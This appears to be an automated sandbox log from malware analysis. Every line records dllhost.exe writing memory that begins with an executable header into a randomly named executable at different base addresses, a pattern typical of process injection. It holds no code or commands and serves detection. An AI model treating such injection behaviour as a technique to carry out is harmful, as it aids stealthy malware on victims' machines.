Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
